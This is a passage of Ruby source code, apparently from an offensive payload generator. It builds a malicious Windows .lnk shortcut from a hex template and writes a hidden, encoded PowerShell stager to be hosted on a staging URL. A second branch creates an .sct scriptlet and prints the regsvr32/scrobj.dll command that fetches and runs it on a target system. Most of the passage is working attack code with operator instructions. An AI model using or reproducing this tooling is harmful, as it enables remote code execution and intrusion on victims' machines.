00 00 00 00 00 00 00 00 00 00 00 00 00 00 8D 91 06 00 76 00 31 00 2E 00 30 00 00 00 14 00 6C 00 32 00 00 86 07 00 EA 46 31 58 20 00 70 6F 77 65 72 73 68 65 6C 6C 2E 65 78 65 00 00 4E 00 09 00 04 00 EF BE EA 46 31 58 EA 46 31 58 2E 00 00 00 D8 35 01 00 00 00 03 00 00 00 00 00 91 00 00 00 00 00 00 00 00 00 EE 93 6A 00 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 2E 00 65 00 78 00 65 00 00 00 1E 00 00 00 68 00 00 00 1C 00 00 00 01 00 00 00 1C 00 00 00 2D 00 00 00 00 00 00 00 67 00 00 00 11 00 00 00 03 00 00 00 2E 4A 5C C4 10 00 00 00 00 43 3A 5C 57 69 6E 64 6F 77 73 5C 53 79 73 74 65 6D 33 32 5C 57 69 6E 64 6F 77 73 50 6F 77 65 72 53 68 65 6C 6C 5C 76 31 2E 30 5C 70 6F 77 65 72 73 68 65 6C 6C 2E 65 78 65 00 00 3F 00 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 50 00 6F 00 77 00 65 00 72 00 53 00 68 00 65 00 6C 00 6C 00 5C 00 76 00 31 00 2E 00 30 00 5C 00 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 2E 00 65 00 78 00 65 00 2A 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 50 00 6F 00 77 00 65 00 72 00 53 00 68 00 65 00 6C 00 6C 00 5C 00 76 00 31 00 2E 00 30 00 07 00 #{lnkTEMPLATE_fin} 00 10 00 00 00 05 00 00 A0 25 00 00 00 DD 00 00 00 1C 00 00 00 0B 00 00 A0 77 4E C1 1A E7 02 5D 4E B7 44 2E B1 AE 51 98 B7 DD 00 00 00 60 00 00 00 03 00 00 A0 58 00 00 00 00 00 00 00 77 69 6E 2D 76 73 70 63 2D 63 63 63 73 00 00 00 F4 DA 8A FA 50 6C 16 4E B6 D1 F4 76 95 D3 4E 6C 33 B4 25 CD 3B 92 E5 11 AC 09 00 0C 29 C0 A1 48 F4 DA 8A FA 50 6C 16 4E B6 D1 F4 76 95 D3 4E 6C 33 B4 25 CD 3B 92 E5 11 AC 09 00 0C 29 C0 A1 48 CC 00 00 00 02 00 00 A0 07 00 F5 00 78 00 29 23 78 00 1E 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 0C 00 36 00 00 00 90 01 00 00 43 00 6F 00 6E 00 73 00 6F 00 6C 00 61 00 73 00 00 00 00 00 31 00 35 00 00 00 F0 87 FD 7F 00 00 00 00 00 00 00 00 00 00 00 00 F0 87 FD 7F 00 00 00 00 00 00 00 00 00 00 03 00 01 00 00 00 00 00 19 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 32 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 C0 C0 C0 00 80 80 80 00 00 00 FF 00 00 FF 00 00 00 FF FF 00 FF 00 00 00 FF 00 FF 00 FF FF 00 00 FF FF FF 00 2F 03 00 00 09 00 00 A0 89 00 00 00 31 53 50 53 ED 30 BD DA 43 00 89 47 A7 F8 D0 13 A4 73 66 22 6D 00 00 00 64 00 00 00 00 1F 00 00 00 2D 00 00 00 76 00 31 00 2E 00 30 00 20 00 28 00 43 00 3A 00 5C 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 50 00 6F 00 77 00 65 00 72 00 53 00 68 00 65 00 6C 00 6C 00 29 00 00 00 00 00 00 00 00 00 89 00 00 00 31 53 50 53 E2 8A 58 46 BC 4C 38 43 BB FC 13 93 26 98 6D CE 6D 00 00 00 04 00 00 00 00 1F 00 00 00 2E 00 00 00 53 00 2D 00 31 00 2D 00 35 00 2D 00 32 00 31 00 2D 00 32 00 36 00 31 00 32 00 39 00 37 00 35 00 35 00 36 00 2D 00 31 00 34 00 34 00 33 00 35 00 34 00 38 00 39 00 38 00 31 00 2D 00 34 00 32 00 34 00 37 00 30 00 38 00 38 00 39 00 31 00 33 00 2D 00 31 00 30 00 30 00 30 00 00 00 00 00 00 00 82 00 00 00 31 53 50 53 07 06 57 0C 96 03 DE 43 9D 61 E3 21 D7 DF 50 26 11 00 00 00 03 00 00 00 00 0B 00 00 00 FF FF 00 00 11 00 00 00 01 00 00 00 00 0B 00 00 00 FF FF 00 00 11 00 00 00 02 00 00 00 00 0B 00 00 00 FF FF 00 00 11 00 00 00 04 00 00 00 00 0B 00 00 00 00 00 00 00 11 00 00 00 06 00 00 00 00 02 00 00 00 FF 00 00 00 11 00 00 00 05 00 00 00 00 0B 00 00 00 FF FF 00 00 00 00 00 00 B5 00 00 00 31 53 50 53 30 F1 25 B7 EF 47 1A 10 A5 F1 02 60 8C 9E EB AC 31 00 00 00 0A 00 00 00 00 1F 00 00 00 0F 00 00 00 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 2E 00 65 00 78 00 65 00 00 00 00 00 15 00 00 00 0F 00 00 00 00 40 00 00 00 00 BB AD C8 FF BA D0 01 15 00 00 00 0C 00 00 00 00 15 00 00 00 00 86 07 00 00 00 00 00 29 00 00 00 04 00 00 00 00 1F 00 00 00 0C 00 00 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 00 15 00 00 00 0E 00 00 00 00 40 00 00 00 12 27 43 C8 FF BA D0 01 00 00 00 00 A1 00 00 00 31 53 50 53 A6 6A 63 28 3D 95 D2 11 B5 D6 00 C0 4F D9 18 D0 85 00 00 00 1E 00 00 00 00 1F 00 00 00 3A 00 00 00 43 00 3A 00 5C 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 50 00 6F 00 77 00 65 00 72 00 53 00 68 00 65 00 6C 00 6C 00 5C 00 76 00 31 00 2E 00 30 00 5C 00 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 2E 00 65 00 78 00 65 00 00 00 00 00 00 00 39 00 00 00 31 53 50 53 B1 16 6D 44 AD 8D 70 48 A7 48 40 2E A4 3D 78 8C 1D 00 00 00 68 00 00 00 00 48 00 00 00 4A C3 71 0C E8 87 50 4A 9B 88 AA 25 23 1D B9 07 00 00 00 00 00 00 00 00 00 00 00 00".split(" ") 450 | 451 | # block 391 hex, equivilent to 913 in decimal 452 | # reversing .lnk files, the hex value of 913 equals to the length of our command 453 | lnkPAYLOAD[913] = lnkLENGTH 454 | 455 | # join the array and create a final hex string 456 | lnkPAYLOADstream = lnkPAYLOAD.join("") 457 | 458 | def hex_to_bin(s) 459 | s.scan(/../).map { |x| x.hex.chr }.join 460 | end 461 | 462 | outLNKfile = hex_to_bin(lnkPAYLOADstream) 463 | 464 | File.binwrite("file.lnk", outLNKfile) 465 | puts "Payload created! - file.lnk\n\n" 466 | 467 | powershell_encoded = gen_PS_shellcode() 468 | outSTAGE = "powershell -nop -win Hidden -noni -enc #{powershell_encoded}" 469 | File.write( 'file.html', outSTAGE) 470 | puts "Stage file created! - file.html\n\n" 471 | 472 | puts "-------------copy file.html and host it on #{stageURL}--------------" 473 | puts "To run, execute \"file.lnk\" on target system" 474 | 475 | end 476 | 477 | ########################SCT_ENCODE############################## 478 | if $lencode == "sct" 479 | 480 | powershell_encoded = gen_PS_shellcode() 481 | 482 | 483 | stageURL = String.new 484 | 485 | puts "This encoding format requires staging" 486 | puts "Enter the full URL on which the payload will be hosted:" 487 | stageURL = gets.chomp! 488 | 489 | 490 | sctTEMPLATE = %{ 491 | 492 | 493 | 499 | 500 | 501 | 503 | 504 | 505 | 506 | 507 | 508 | 515 | 516 | 517 | 518 | 519 | 520 | 530 | 531 | } 532 | 533 | File.write( 'index.sct', sctTEMPLATE) 534 | puts "Payload created! - index.sct\n\n\n" 535 | 536 | 537 | puts "-------------copy the index.sct and host it on #{stageURL}--------------" 538 | puts "To run, execute the following on the target system:\nregsvr32 /s /n /u /i:#{stageURL}/index.sct scrobj.dll" 539 | 540 | end 541 | 542 | --------------------------------------------------------------------------------